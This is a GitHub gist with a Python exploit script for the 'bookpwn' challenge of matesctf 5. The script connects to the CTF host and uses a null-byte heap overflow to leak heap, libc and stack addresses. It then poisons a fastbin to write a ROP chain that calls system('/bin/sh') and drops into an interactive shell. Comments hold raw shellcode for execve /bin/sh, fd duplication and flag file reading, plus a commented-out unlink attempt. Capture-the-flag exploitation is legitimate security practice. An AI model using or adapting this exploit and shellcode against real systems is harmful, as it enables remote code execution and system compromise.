Skip to content

Instantly share code, notes, and snippets.

@Mipu94

Mipu94/matesctf5-bookpwn.py

Last active May 30, 2016 07:37
Show Gist options
  • Save Mipu94/27a2c5a465b2e1df07ad1df5e80ac955 to your computer and use it in GitHub Desktop.
Save Mipu94/27a2c5a465b2e1df07ad1df5e80ac955 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
matesctf5-bookpwn.py
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
#32 system=0x468f0 ; binsh=0x17dbc5
#64 system=0x46640 ; binsh=0x17ccdb
#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4"
#######################################################
# DEBUG PEDA
#######################################################
struct="""
struct_book
{
_DWORD protect;
char title;
32 meepwn;
_DWORD book_size;
char *content;
};
"""
f=open("peda-debug","w")
f.write(struct)
f.close()
#0x7F0C6 _int_free+422 checkback
#0x7F11B _int_free+507 checknext
#0x7F282 _int_free+507 checknext
"""b*_int_free
b*_int_free+422
b*_int_free+507
b*_int_free+481
b*_int_free+866
"""
debug="""
b*fgets+244
b*0x400DD9
b*0x4010E6
b*0x400D6B
"""
filename=""
f=open("peda-cmd","w")
#f.write("source /home/athos/ctf/form/gdbheapload")
f.write(debug)
f.close()
def p(m):
return pack("<Q", m)
def u(m):
return unpack("<Q", m)[0]
########################################################
# PWN! PWN! PWN!
########################################################
def add_book(size,title,content):
send("1\n")
recvu("Enter book size:")
send(str(size)+"\n")
recvu("Enter book title:")
send(title+"\n")
recvu("Enter book content:")
send(content+"\n")
recvu("Protect this book? (y/N)")
send("y\n")
recvu("$>")
def del_book(id):
send("2\n")
recvu("Enter book id:")
send(str(id)+"\n")
def doexploit():
s=sock("lab04.matesctf.org",1337)
#s=sock("localhost",4000)
recvu("$>")
send("5\n")
recvu("Enter pass phrase:")
send("\xbbDhQ\xb8\xae"+"\n")
recvu("$>")
add_book(0x100,"A"*30,"1"*0x90)
add_book(0x30,"B"*30,"2"*0x20)
add_book(0x20,"C"*30,"3"*0x10)
#leak heap
del_book(1)
#presize chunk_size protect title size pointer_heap
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*31+"AAAA" #XXXXXX
add_book(0x1f0,"A"*32,payload)
send("3\n")
recvu("Enter book id:")
send("2\n")
leak=recvu("$>")
d=leak.find("flag")
heapleak = u(leak[d+0x24:d+0x2c])
heapbase = heapleak - 0x290
#leak libc
fopen=0x6020A0
del_book(1)
#presize chunk_size protect title size pointer_heap
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(fopen)
add_book(0x1f0,"A"*32,payload)
send("3\n")
recvu("Enter book id:")
send("2\n")
leak=recvu("$>")
d = leak.find("Content:")
leak = leak[d+9:d+17]
libc=u(leak)
#dtors = baselibc + 0x5e26f0L
#baselibc = libc - 0x6e4e0
#system =baselibc + 0x46640
#binsh = baselibc + 0x17ccdb
baselibc = libc - 0x6e410
system =baselibc + 0x46590
binsh = baselibc + 0x17c8c3
tls_dtor_list = baselibc + 0x5e26f0L
print "heapbase %s "%hex(heapbase)
print "leak fopen %s"%hex(libc)
print "baseblibc %s"%hex(baselibc)
print "system %s"%hex(system)
print "binsh %s"%hex(binsh)
print "tls_dtor_list %s"%hex(tls_dtor_list)
###############################FAIL############################################################
#create fake pchunk and remove book id=2,consolidate forward backward => write dtors
#del_book(1)
# #presize chunk_size protect title size pointer_heap
#chunk_addr = heapbase + 0x160
#callers_addr = heapbase + 0x50
#print "free chunk %s"%hex(chunk_addr)
#print "callers %s"%hex(callers_addr)
#(tls_dtor_list-X*5)+X*5 = &(system | binsh ...)= callers_addr
#P->fd_nextsize->bk_nextsize = P->bk_nextsize
#chunk = p(0x30) + p(0x90) + "K"*40 + p(heapbase+0x2b0) + "D"*(0x90-64) + p(0)+p(0x11)+p(0)+p(0)
#p_chunk_addr = chunk_addr - 0x40
#p_chunk = p(0) + p(0x400) + p(p_chunk_addr)+p(p_chunk_addr)+p(tls_dtor_list-0x40)+p(callers_addr)
#payload = p(system)+p(binsh)+(chunk_addr-callers_addr-0x50)*"X"+ p_chunk + chunk
#add_book(0x1f0,"A"*32,payload)
#send("2\n")
#recvu("Enter book id:")
#raw_input(">>>")
#send("2\n")
#recvu("$>")
##############################################################################################
#leak stack
#p_leakstack = baselibc + 0x5c9a40L
p_leakstack = baselibc + 0x3c14a0L
del_book(1)
#presize chunk_size protect title size pointer_heap
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(p_leakstack) #XXXXXX
add_book(0x1f0,"A"*32,payload)
send("3\n")
recvu("Enter book id:")
send("2\n")
leak=recvu("$>")
d=leak.find("Content:\n")
stack = u(leak[d+9:d+17])
print "leakstack: ",hex(stack)
#fake fastbin fd = stackaddr ; malloc fastbin(stack) and write to stack
del_book(1)
#presize chunk_size protect title size pointer_heap
payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(heapbase+0x1a0) #XXXXXX
#write to stack
addr_stack = stack-0x156-8
add_book(0x1f0,"A"*32,payload)
del_book(2)
del_book(1)
#fake fastbin fd
payload = "X"*0x100+p(0x110)+p(0x40)+p(addr_stack)
add_book(0x1f0,"A"*32,payload)
#malloc fastbin,write rop to stack
prdiret = 0x401243
rop = "A"*(0x30-34)+p(prdiret)+p(binsh)+ p(system)
send("1\n")
recvu("Enter book size:")
send(str(0x30)+"\n")
recvu("Enter book title:")
send("A"*30+"\n")
recvu("Enter book content:")
send(rop+"\n")
print "shell>> "
telnet()
s.close()
doexploit()
# flag :matesctf{null byte corruption}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment